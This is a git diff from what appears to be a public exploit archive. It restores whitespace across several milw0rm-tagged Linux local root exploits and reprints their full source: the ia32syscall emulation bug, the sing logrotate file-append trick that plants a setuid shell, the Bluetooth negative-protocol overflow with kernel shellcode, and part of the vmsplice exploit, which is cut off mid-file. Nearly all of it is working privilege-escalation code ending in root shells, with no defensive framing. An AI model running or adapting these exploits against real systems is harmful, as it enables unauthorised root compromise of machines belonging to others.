-1,139 +1,139 @@ -/* - * exploit for x86_64 linux kernel ia32syscall emulation - * bug, discovered by Wojciech Purczynski - * - * by - * Robert Swiecki - * Przemyslaw Frasunek - * Pawel Pisarczyk - * of ATM-Lab http://www.atm-lab.pl - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -uint32_t uid, euid, suid; - -static void kernelmodecode(void) -{ - int i; - uint8_t *gs; - uint32_t *ptr; - - asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs)); - - for (i = 200; i < 1000; i+=1) { - - ptr = (uint32_t*) (gs + i); - - if ((ptr[0] == uid) && (ptr[1] == euid) - && (ptr[2] == suid) && (ptr[3] == uid)) { - ptr[0] = 0; //UID - ptr[1] = 0; //EUID - ptr[2] = 0; //SUID - - break; - } - } - -} - -static void docall(uint64_t *ptr, uint64_t size) -{ - getresuid(&uid, &euid, &suid); - - uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF); - - if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC, - MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { - printf("mmap fault\n"); - exit(1); - } - - for (; ptr < (tmp + size); ptr++) - *ptr = (uint64_t)kernelmodecode; - - __asm__("\n" - "\tmovq $0x101, %rax\n" - "\tint $0x80\n"); - - printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid()); - execl("/bin/sh", "bin/sh", 0); - printf("no /bin/sh ??\n"); - exit(0); -} - -int main(int argc, char **argv) -{ - int pid, status, set = 0; - uint64_t rax; - uint64_t kern_s = 0xffffffff80000000; - uint64_t kern_e = 0xffffffff84000000; - uint64_t off = 0x0000000800000101 * 8; - - if (argc == 4) { - docall((uint64_t*)(kern_s + off), kern_e - kern_s); - exit(0); - } - - if ((pid = fork()) == 0) { - ptrace(PTRACE_TRACEME, 0, 0, 0); - execl(argv[0], argv[0], "2", "3", "4", 0); - perror("exec fault"); - exit(1); - } - - if (pid == -1) { - printf("fork fault\n"); - exit(1); - } - - for (;;) { - if (wait(&status) != pid) - continue; - - if (WIFEXITED(status)) { - printf("Process finished\n"); - break; - } - - if (!WIFSTOPPED(status)) - continue; - - if (WSTOPSIG(status) != SIGTRAP) { - printf("Process received signal: %d\n", WSTOPSIG(status)); - break; - } - - rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); - if (rax == 0x000000000101) { - if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) { - printf("PTRACE_POKEUSER fault\n"); - exit(1); - } - set = 1; - } - - if ((rax == 11) && set) { - ptrace(PTRACE_DETACH, pid, 0, 0); - for(;;) - sleep(10000); - } - - if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) { - printf("PTRACE_SYSCALL fault\n"); - exit(1); - } - } - - return 0; -} - -// milw0rm.com [2007-09-27] +/* + * exploit for x86_64 linux kernel ia32syscall emulation + * bug, discovered by Wojciech Purczynski + * + * by + * Robert Swiecki + * Przemyslaw Frasunek + * Pawel Pisarczyk + * of ATM-Lab http://www.atm-lab.pl + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +uint32_t uid, euid, suid; + +static void kernelmodecode(void) +{ + int i; + uint8_t *gs; + uint32_t *ptr; + + asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs)); + + for (i = 200; i < 1000; i+=1) { + + ptr = (uint32_t*) (gs + i); + + if ((ptr[0] == uid) && (ptr[1] == euid) + && (ptr[2] == suid) && (ptr[3] == uid)) { + ptr[0] = 0; //UID + ptr[1] = 0; //EUID + ptr[2] = 0; //SUID + + break; + } + } + +} + +static void docall(uint64_t *ptr, uint64_t size) +{ + getresuid(&uid, &euid, &suid); + + uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF); + + if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC, + MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { + printf("mmap fault\n"); + exit(1); + } + + for (; ptr < (tmp + size); ptr++) + *ptr = (uint64_t)kernelmodecode; + + __asm__("\n" + "\tmovq $0x101, %rax\n" + "\tint $0x80\n"); + + printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid()); + execl("/bin/sh", "bin/sh", 0); + printf("no /bin/sh ??\n"); + exit(0); +} + +int main(int argc, char **argv) +{ + int pid, status, set = 0; + uint64_t rax; + uint64_t kern_s = 0xffffffff80000000; + uint64_t kern_e = 0xffffffff84000000; + uint64_t off = 0x0000000800000101 * 8; + + if (argc == 4) { + docall((uint64_t*)(kern_s + off), kern_e - kern_s); + exit(0); + } + + if ((pid = fork()) == 0) { + ptrace(PTRACE_TRACEME, 0, 0, 0); + execl(argv[0], argv[0], "2", "3", "4", 0); + perror("exec fault"); + exit(1); + } + + if (pid == -1) { + printf("fork fault\n"); + exit(1); + } + + for (;;) { + if (wait(&status) != pid) + continue; + + if (WIFEXITED(status)) { + printf("Process finished\n"); + break; + } + + if (!WIFSTOPPED(status)) + continue; + + if (WSTOPSIG(status) != SIGTRAP) { + printf("Process received signal: %d\n", WSTOPSIG(status)); + break; + } + + rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); + if (rax == 0x000000000101) { + if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) { + printf("PTRACE_POKEUSER fault\n"); + exit(1); + } + set = 1; + } + + if ((rax == 11) && set) { + ptrace(PTRACE_DETACH, pid, 0, 0); + for(;;) + sleep(10000); + } + + if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) { + printf("PTRACE_SYSCALL fault\n"); + exit(1); + } + } + + return 0; +} + +// milw0rm.com [2007-09-27] diff --git a/platforms/linux/local/466.pl b/platforms/linux/local/466.pl index 01eb2f979..f04a6397a 100755 --- a/platforms/linux/local/466.pl +++ b/platforms/linux/local/466.pl @@ -22,6 +22,6 @@ $buffer .= " "; $buffer .= "B" x 290; -exec("$target -nb $buffer"); - -# milw0rm.com [2004-09-16] +exec("$target -nb $buffer"); + +# milw0rm.com [2004-09-16] diff --git a/platforms/linux/local/469.c b/platforms/linux/local/469.c index 6f7bb54e5..5c482f6bf 100755 --- a/platforms/linux/local/469.c +++ b/platforms/linux/local/469.c @@ -42,6 +42,6 @@ gcc -o ss ss.c export RSH=/tmp/s $READCD dev=REMOTE:brk.chroot.org:1,0,1 1 >/dev/null 2>&1 /tmp/ss - - -// milw0rm.com [2004-09-19] + + +// milw0rm.com [2004-09-19] diff --git a/platforms/linux/local/4698.c b/platforms/linux/local/4698.c index 23d8d58b8..1c582fc70 100755 --- a/platforms/linux/local/4698.c +++ b/platforms/linux/local/4698.c @@ -1,58 +1,58 @@ -/* - sing file append exploit - by bannedit - - 12/05/2007 - - The original reporter of this issue included an example session which - added an account to the machine. - - The method for this exploit is slightly different and much more - quiet. Although it relies upon logrotate for help. - - This could easily be modified to work with cron daemons which - are not too strict about the cron file format. However, - when I tested vixie cron it appears that there are - better checks for file format compilance these days. -*/ - -#include -#include -#include - -#define SING_PATH "/usr/bin/sing" - -char *file = "/etc/logrotate.d/sing"; -char *evilname = "\n/tmp/sing {\n daily\n size=0\n firstaction\n chown root /tmp/shell; chmod 4755 /tmp/shell; rm -f /etc/logrotate.d/sing; rm -f /tmp/sing*\n endscript\n}\n\n\n"; - - - -int main() -{ -FILE *fp; -int pid; - - puts("sing file append exploit"); - puts("------------------------"); - puts("by bannedit"); - - if(fp = fopen("/tmp/shell", "w+")) - { - fputs("#!/bin/bash\n", fp); - fputs("/bin/bash -p", fp); - fclose(fp); - system("touch /tmp/sing; echo garbage >> /tmp/sing"); - } - else - { - puts("error making shell file"); - exit(-1); - } - - sleep(5); - printf("done sleeping...\n"); - execl(SING_PATH, evilname, "-Q", "-c", "1", "-L", file, "localhost", 0); - return 0; -} - -// milw0rm.com [2007-12-06] +/* + sing file append exploit + by bannedit + + 12/05/2007 + + The original reporter of this issue included an example session which + added an account to the machine. + + The method for this exploit is slightly different and much more + quiet. Although it relies upon logrotate for help. + + This could easily be modified to work with cron daemons which + are not too strict about the cron file format. However, + when I tested vixie cron it appears that there are + better checks for file format compilance these days. +*/ + +#include +#include +#include + +#define SING_PATH "/usr/bin/sing" + +char *file = "/etc/logrotate.d/sing"; +char *evilname = "\n/tmp/sing {\n daily\n size=0\n firstaction\n chown root /tmp/shell; chmod 4755 /tmp/shell; rm -f /etc/logrotate.d/sing; rm -f /tmp/sing*\n endscript\n}\n\n\n"; + + + +int main() +{ +FILE *fp; +int pid; + + puts("sing file append exploit"); + puts("------------------------"); + puts("by bannedit"); + + if(fp = fopen("/tmp/shell", "w+")) + { + fputs("#!/bin/bash\n", fp); + fputs("/bin/bash -p", fp); + fclose(fp); + system("touch /tmp/sing; echo garbage >> /tmp/sing"); + } + else + { + puts("error making shell file"); + exit(-1); + } + + sleep(5); + printf("done sleeping...\n"); + execl(SING_PATH, evilname, "-Q", "-c", "1", "-L", file, "localhost", 0); + return 0; +} + +// milw0rm.com [2007-12-06] diff --git a/platforms/linux/local/470.c b/platforms/linux/local/470.c index 4b1ca12f4..988b3a95a 100755 --- a/platforms/linux/local/470.c +++ b/platforms/linux/local/470.c @@ -107,6 +107,6 @@ int main( int argc, char *argv[] ) return( 0 ); } - - -// milw0rm.com [2004-09-21] + + +// milw0rm.com [2004-09-21] diff --git a/platforms/linux/local/4756.c b/platforms/linux/local/4756.c index f35de49a2..8ef5dba53 100755 --- a/platforms/linux/local/4756.c +++ b/platforms/linux/local/4756.c @@ -1,168 +1,167 @@ - -/* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT -* -* 19 October 2005 - -http://backdoored.net -Visit us for Undetected keyloggers and packers.Thanx - - -h4x0r bluetooth $ id -uid=1000(addicted) gid=100(users) groups=100(users) -h4x0r bluetooth $ - -h4x0r bluetooth $ ./backdoored-bluetooth -KERNEL Oops. Exit Code = 11.(Segmentation fault) -KERNEL Oops. Exit Code = 11.(Segmentation fault) -KERNEL Oops. Exit Code = 11.(Segmentation fault) -KERNEL Oops. Exit Code = 11.(Segmentation fault) -KERNEL Oops. Exit Code = 11.(Segmentation fault) -Checking the Effective user id after overflow : UID = 0 -h4x0r bluetooth # id -uid=0(root) gid=0(root) groups=100(users) -h4x0r bluetooth # - -h4x0r bluetooth # dmesg -PREEMPT SMP -Modules linked in: -CPU: 0 -EIP: 0060:[] Not tainted VLI -EFLAGS: 00010286 (2.6.9) -EIP is at bt_sock_create+0x3d/0x130 -eax: ffffffff ebx: ffebfe34 ecx: 00000000 edx: c051bea0 -esi: ffffffa3 edi: ffffff9f ebp: 00000001 esp: c6729f1c -ds: 007b es: 007b ss: 0068 -Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000 task=c6728a20) -Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680 ffebfe34 - 00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34 - c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80 -Call Trace: - [] __sock_create+0xfb/0x2a0 - [] sock_create+0x2d/0x40 - [] sys_socket+0x2b/0x60 - [] sys_socketcall+0x68/0x260 - [] finish_task_switch+0x3c/0x90 - [] schedule_tail+0x17/0x50 - [] do_page_fault+0x0/0x5e9 - [] syscall_call+0x7/0xb -Code: 24 0c 89 7c 24 10 83 fb 07 0f 8f b1 00 00 00 8b 04 9d 60 a4 5d c0 85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00 <8b> 50 10 bf 01 00 00 00 -85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40 - -*/ - - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000 -#define KERNEL_SPACE_MEMORY_BRUTE_END 0xffffffff -#define KERNEL_SPACE_BUFFER 0x100000 - - -char asmcode[] = /*Global shellcode*/ - -"\xb8\x00\xf0\xff\xff\x31\xc9\x21\xe0\x8b\x10\x89\x8a" -"\x80\x01\x00\x00\x31\xc9\x89\x8a\x7c\x01\x00\x00\x8b" -"\x00\x31\xc9\x31\xd2\x89\x88\x90\x01\x00\x00\x89\x90" -"\x8c\x01\x00\x00\xb8\xff\xff\xff\xff\xc3"; - - - -struct net_proto_family { - int family; - int (*create) (int *sock, int protocol); - short authentication; - short encryption; - short encrypt_net; - int *owner; - }; - - -int check_zombie_child(int status,pid_t pid) -{ - waitpid(pid,&status,0); - if(WIFEXITED(status)) - { - if(WEXITSTATUS(status) != 0xFF) - exit(-1); - } - else if (WIFSIGNALED(status)) - { - printf("KERNEL Oops. Exit Code = %d.(%s)\n",WTERMSIG(status),strsignal(WTERMSIG(status))); - return(WTERMSIG(status)); - } -} - - -int brute_socket_create (int negative_proto_number) -{ - socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */ - int i; - i = geteuid(); - printf("Checking the Effective user id after overflow : UID = %d\n",i); -if(i) -exit(EXIT_FAILURE); - printf("0wnage D0ne bro.\n"); - execl("/bin/sh","sh",NULL); - exit(EXIT_SUCCESS); -} - - -int main(void) -{ - -pid_t pid; -int counter; -int status; -int *kernel_return; - -char kernel_buffer[KERNEL_SPACE_BUFFER]; -unsigned int brute_start; -unsigned int where_kernel; - -struct net_proto_family *bluetooth; - -bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family)); -bzero(bluetooth,sizeof(struct net_proto_family)); - -bluetooth->family = AF_BLUETOOTH; -bluetooth->authentication = 0x0; /* No Authentication */ -bluetooth->encryption = 0x0; /* No Encryption */ -bluetooth->encrypt_net = 0x0; /* No Encrypt_net */ -bluetooth->owner = 0x0; /* No fucking owner */ -bluetooth->create = (int *) asmcode; - - - -kernel_return = (int *) kernel_buffer; - -for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++) - *kernel_return = (int)bluetooth; - -brute_start = KERNEL_SPACE_MEMORY_BRUTE_START; -printf("Bluetooth stack local root exploit\n"); -printf("http://backdoored/net"); - -while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END ) - { - where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ; - where_kernel = -where_kernel; - - pid = fork(); - if(pid == 0 ) - brute_socket_create(where_kernel); - check_zombie_child(status,pid); - brute_start += KERNEL_SPACE_BUFFER; - fflush(stdout); -} -return 0; -} - -// milw0rm.com [2007-12-18] +/* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT +* +* 19 October 2005 + +http://backdoored.net +Visit us for Undetected keyloggers and packers.Thanx + + +h4x0r bluetooth $ id +uid=1000(addicted) gid=100(users) groups=100(users) +h4x0r bluetooth $ + +h4x0r bluetooth $ ./backdoored-bluetooth +KERNEL Oops. Exit Code = 11.(Segmentation fault) +KERNEL Oops. Exit Code = 11.(Segmentation fault) +KERNEL Oops. Exit Code = 11.(Segmentation fault) +KERNEL Oops. Exit Code = 11.(Segmentation fault) +KERNEL Oops. Exit Code = 11.(Segmentation fault) +Checking the Effective user id after overflow : UID = 0 +h4x0r bluetooth # id +uid=0(root) gid=0(root) groups=100(users) +h4x0r bluetooth # + +h4x0r bluetooth # dmesg +PREEMPT SMP +Modules linked in: +CPU: 0 +EIP: 0060:[] Not tainted VLI +EFLAGS: 00010286 (2.6.9) +EIP is at bt_sock_create+0x3d/0x130 +eax: ffffffff ebx: ffebfe34 ecx: 00000000 edx: c051bea0 +esi: ffffffa3 edi: ffffff9f ebp: 00000001 esp: c6729f1c +ds: 007b es: 007b ss: 0068 +Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000 task=c6728a20) +Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680 ffebfe34 + 00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34 + c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80 +Call Trace: + [] __sock_create+0xfb/0x2a0 + [] sock_create+0x2d/0x40 + [] sys_socket+0x2b/0x60 + [] sys_socketcall+0x68/0x260 + [] finish_task_switch+0x3c/0x90 + [] schedule_tail+0x17/0x50 + [] do_page_fault+0x0/0x5e9 + [] syscall_call+0x7/0xb +Code: 24 0c 89 7c 24 10 83 fb 07 0f 8f b1 00 00 00 8b 04 9d 60 a4 5d c0 85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00 <8b> 50 10 bf 01 00 00 00 +85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40 + +*/ + + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000 +#define KERNEL_SPACE_MEMORY_BRUTE_END 0xffffffff +#define KERNEL_SPACE_BUFFER 0x100000 + + +char asmcode[] = /*Global shellcode*/ + +"\xb8\x00\xf0\xff\xff\x31\xc9\x21\xe0\x8b\x10\x89\x8a" +"\x80\x01\x00\x00\x31\xc9\x89\x8a\x7c\x01\x00\x00\x8b" +"\x00\x31\xc9\x31\xd2\x89\x88\x90\x01\x00\x00\x89\x90" +"\x8c\x01\x00\x00\xb8\xff\xff\xff\xff\xc3"; + + + +struct net_proto_family { + int family; + int (*create) (int *sock, int protocol); + short authentication; + short encryption; + short encrypt_net; + int *owner; + }; + + +int check_zombie_child(int status,pid_t pid) +{ + waitpid(pid,&status,0); + if(WIFEXITED(status)) + { + if(WEXITSTATUS(status) != 0xFF) + exit(-1); + } + else if (WIFSIGNALED(status)) + { + printf("KERNEL Oops. Exit Code = %d.(%s)\n",WTERMSIG(status),strsignal(WTERMSIG(status))); + return(WTERMSIG(status)); + } +} + + +int brute_socket_create (int negative_proto_number) +{ + socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */ + int i; + i = geteuid(); + printf("Checking the Effective user id after overflow : UID = %d\n",i); +if(i) +exit(EXIT_FAILURE); + printf("0wnage D0ne bro.\n"); + execl("/bin/sh","sh",NULL); + exit(EXIT_SUCCESS); +} + + +int main(void) +{ + +pid_t pid; +int counter; +int status; +int *kernel_return; + +char kernel_buffer[KERNEL_SPACE_BUFFER]; +unsigned int brute_start; +unsigned int where_kernel; + +struct net_proto_family *bluetooth; + +bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family)); +bzero(bluetooth,sizeof(struct net_proto_family)); + +bluetooth->family = AF_BLUETOOTH; +bluetooth->authentication = 0x0; /* No Authentication */ +bluetooth->encryption = 0x0; /* No Encryption */ +bluetooth->encrypt_net = 0x0; /* No Encrypt_net */ +bluetooth->owner = 0x0; /* No fucking owner */ +bluetooth->create = (int *) asmcode; + + + +kernel_return = (int *) kernel_buffer; + +for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++) + *kernel_return = (int)bluetooth; + +brute_start = KERNEL_SPACE_MEMORY_BRUTE_START; +printf("Bluetooth stack local root exploit\n"); +printf("http://backdoored/net"); + +while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END ) + { + where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ; + where_kernel = -where_kernel; + + pid = fork(); + if(pid == 0 ) + brute_socket_create(where_kernel); + check_zombie_child(status,pid); + brute_start += KERNEL_SPACE_BUFFER; + fflush(stdout); +} +return 0; +} + +// milw0rm.com [2007-12-18] diff --git a/platforms/linux/local/476.c b/platforms/linux/local/476.c index 0c8036d92..75aebdcdd 100755 --- a/platforms/linux/local/476.c +++ b/platforms/linux/local/476.c @@ -37,6 +37,6 @@ printf(" by CoKi "); execle(PATH, "dupescan", buf, NULL, env); } - - -// milw0rm.com [2004-09-23] + + +// milw0rm.com [2004-09-23] diff --git a/platforms/linux/local/479.c b/platforms/linux/local/479.c index b6cc68def..6d7743eec 100755 --- a/platforms/linux/local/479.c +++ b/platforms/linux/local/479.c @@ -338,6 +338,6 @@ void banner(void) { fputs("\tGNU SharUtils <= 4.2.1 Local Format String Exploit\n" "\tnarkotix@linuxmail.org\n",stdout); } - - -// milw0rm.com [2004-09-25] + + +// milw0rm.com [2004-09-25] diff --git a/platforms/linux/local/5092.c b/platforms/linux/local/5092.c index 78373f0ce..8d6a66553 100755 --- a/platforms/linux/local/5092.c +++ b/platforms/linux/local/5092.c @@ -1,289 +1,289 @@ -/* - * jessica_biel_naked_in_my_bed.c - * - * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura. - * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. - * Stejnak je to stare jak cyp a aj jakesyk rozbite. - * - * Linux vmsplice Local Root Exploit - * By qaaz - * - * Linux 2.6.17 - 2.6.24.1 - * - * This is quite old code and I had to rewrite it to even compile. - * It should work well, but I don't remeber original intent of all - * the code, so I'm not 100% sure about it. You've been warned ;) - * - * -static -Wno-format - */ -#define _GNU_SOURCE -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#define __KERNEL__ -#include - -#define PIPE_BUFFERS 16 -#define PG_compound 14 -#define uint unsigned int -#define static_inline static inline __attribute__((always_inline)) -#define STACK(x) (x + sizeof(x) - 40) - -struct page { - unsigned long flags; - int count; - int mapcount; - unsigned long private; - void *mapping; - unsigned long index; - struct { long next, prev; } lru; -}; - -void exit_code(); -char exit_stack[1024 * 1024]; - -void die(char *msg, int err) -{ - printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); - fflush(stdout); - fflush(stderr); - exit(1); -} - -#if defined (__i386__) - -#ifndef __NR_vmsplice -#define __NR_vmsplice 316 -#endif - -#define USER_CS 0x73 -#define USER_SS 0x7b -#define USER_FL 0x246 - -static_inline -void exit_kernel() -{ - __asm__ __volatile__ ( - "movl %0, 0x10(%%esp) ;" - "movl %1, 0x0c(%%esp) ;" - "movl %2, 0x08(%%esp) ;" - "movl %3, 0x04(%%esp) ;" - "movl %4, 0x00(%%esp) ;" - "iret" - : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), - "i" (USER_CS), "r" (exit_code) - ); -} - -static_inline -void * get_current() -{ - unsigned long curr; - __asm__ __volatile__ ( - "movl %%esp, %%eax ;" - "andl %1, %%eax ;" - "movl (%%eax), %0" - : "=r" (curr) - : "i" (~8191) - ); - return (void *) curr; -} - -#elif defined (__x86_64__) - -#ifndef __NR_vmsplice -#define __NR_vmsplice 278 -#endif - -#define USER_CS 0x23 -#define USER_SS 0x2b -#define USER_FL 0x246 - -static_inline -void exit_kernel() -{ - __asm__ __volatile__ ( - "swapgs ;" - "movq %0, 0x20(%%rsp) ;" - "movq %1, 0x18(%%rsp) ;" - "movq %2, 0x10(%%rsp) ;" - "movq %3, 0x08(%%rsp) ;" - "movq %4, 0x00(%%rsp) ;" - "iretq" - : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), - "i" (USER_CS), "r" (exit_code) - ); -} - -static_inline -void * get_current() -{ - unsigned long curr; - __asm__ __volatile__ ( - "movq %%gs:(0), %0" - : "=r" (curr) - ); - return (void *) curr; -} - -#else -#error "unsupported arch" -#endif - -#if defined (_syscall4) -#define __NR__vmsplice __NR_vmsplice -_syscall4( - long, _vmsplice, - int, fd, - struct iovec *, iov, - unsigned long, nr_segs, - unsigned int, flags) - -#else -#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) -#endif - -static uint uid, gid; - -void kernel_code() -{ - int i; - uint *p = get_current(); - - for (i = 0; i < 1024-13; i++) { - if (p[0] == uid && p[1] == uid && - p[2] == uid && p[3] == uid && - p[4] == gid && p[5] == gid && - p[6] == gid && p[7] == gid) { - p[0] = p[1] = p[2] = p[3] = 0; - p[4] = p[5] = p[6] = p[7] = 0; - p = (uint *) ((char *)(p + 8) + sizeof(void *)); - p[0] = p[1] = p[2] = ~0; - break; - } - p++; - } - - exit_kernel(); -} - -void exit_code() -{ - if (getuid() != 0) - die("wtf", 0); - - printf("[+] root\n"); - putenv("HISTFILE=/dev/null"); - execl("/bin/bash", "bash", "-i", NULL); - die("/bin/bash", errno); -} - -int main(int argc, char *argv[]) -{ - int pi[2]; - size_t map_size; - char * map_addr; - struct iovec iov; - struct page * pages[5]; - - uid = getuid(); - gid = getgid(); - setresuid(uid, uid, uid); - setresgid(gid, gid, gid); - - printf("-----------------------------------\n"); - printf(" Linux vmsplice Local Root Exploit\n"); - printf(" By qaaz\n"); - printf("-----------------------------------\n"); - - if (!uid || !gid) - die("!@#$", 0); - - /*****/ - pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; - pages[1] = pages[0] + 1; - - map_size = PAGE_SIZE; - map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, - MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); - if (map_addr == MAP_FAILED) - die("mmap", errno); - - memset(map_addr, 0, map_size); - printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); - printf("[+] page: 0x%lx\n", pages[0]); - printf("[+] page: 0x%lx\n", pages[1]); - - pages[0]->flags = 1 << PG_compound; - pages[0]->private = (unsigned long) pages[0]; - pages[0]->count = 1; - pages[1]->lru.next = (long) kernel_code; - - /*****/ - pages[2] = *(void **) pages[0]; - pages[3] = pages[2] + 1; - - map_size = PAGE_SIZE; - map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE, - MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); - if (map_addr == MAP_FAILED) - die("mmap", errno); - - memset(map_addr, 0, map_size); - printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); - printf("[+] page: 0x%lx\n", pages[2]); - printf("[+] page: 0x%lx\n", pages[3]); - - pages[2]->flags = 1 << PG_compound; - pages[2]->private = (unsigned long) pages[2]; - pages[2]->count = 1; - pages[3]->lru.next = (long) kernel_code; - - /*****/ - pages[4] = *(void **) &(int[2]){PAGE_SIZE,0}; - map_size = PAGE_SIZE; - map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE, - MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); - if (map_addr == MAP_FAILED) - die("mmap", errno); - memset(map_addr, 0, map_size); - printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); - printf("[+] page: 0x%lx\n", pages[4]); - - /*****/ - map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE; - map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE, - MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); - if (map_addr == MAP_FAILED) - die("mmap", errno); - - memset(map_addr, 0, map_size); - printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); - - /*****/ - map_size -= 2 * PAGE_SIZE; - if (munmap(map_addr + map_size, PAGE_SIZE) < 0) - die("munmap", errno); - - /*****/ - if (pipe(pi) < 0) die("pipe", errno); - close(pi[0]); - - iov.iov_base = map_addr; - iov.iov_len = ULONG_MAX; - - signal(SIGPIPE, exit_code); - _vmsplice(pi[1], &iov, 1, 0); - die("vmsplice", errno); - return 0; -} - -// milw0rm.com [2008-02-09] +/* + * jessica_biel_naked_in_my_bed.c + * + * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura. + * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. + * Stejnak je to stare jak cyp a aj jakesyk rozbite. + * + * Linux vmsplice Local Root Exploit + * By qaaz + * + * Linux 2.6.17 - 2.6.24.1 + * + * This is quite old code and I had to rewrite it to even compile. + * It should work well, but I don't remeber original intent of all + * the code, so I'm not 100% sure about it. You've been warned ;) + * + * -static -Wno-format + */ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define __KERNEL__ +#include + +#define PIPE_BUFFERS 16 +#define PG_compound 14 +#define uint unsigned int +#define static_inline static inline __attribute__((always_inline)) +#define STACK(x) (x + sizeof(x) - 40) + +struct page { + unsigned long flags; + int count; + int mapcount; + unsigned long private; + void *mapping; + unsigned long index; + struct { long next, prev; } lru; +}; + +void exit_code(); +char exit_stack[1024 * 1024]; + +void die(char *msg, int err) +{ + printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); + fflush(stdout); + fflush(stderr); + exit(1); +} + +#if defined (__i386__) + +#ifndef __NR_vmsplice +#define __NR_vmsplice 316 +#endif + +#define USER_CS 0x73 +#define USER_SS 0x7b +#define USER_FL 0x246 + +static_inline +void exit_kernel() +{ + __asm__ __volatile__ ( + "movl %0, 0x10(%%esp) ;" + "movl %1, 0x0c(%%esp) ;" + "movl %2, 0x08(%%esp) ;" + "movl %3, 0x04(%%esp) ;" + "movl %4, 0x00(%%esp) ;" + "iret" + : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), + "i" (USER_CS), "r" (exit_code) + ); +} + +static_inline +void * get_current() +{ + unsigned long curr; + __asm__ __volatile__ ( + "movl %%esp, %%eax ;" + "andl %1, %%eax ;" + "movl (%%eax), %0" + : "=r" (curr) + : "i" (~8191) + ); + return (void *) curr; +} + +#elif defined (__x86_64__) + +#ifndef __NR_vmsplice +#define __NR_vmsplice 278 +#endif + +#define USER_CS 0x23 +#define USER_SS 0x2b +#define USER_FL 0x246 + +static_inline +void exit_kernel() +{ + __asm__ __volatile__ ( + "swapgs ;" + "movq %0, 0x20(%%rsp) ;" + "movq %1, 0x18(%%rsp) ;" + "movq %2, 0x10(%%rsp) ;" + "movq %3, 0x08(%%rsp) ;" + "movq %4, 0x00(%%rsp) ;" + 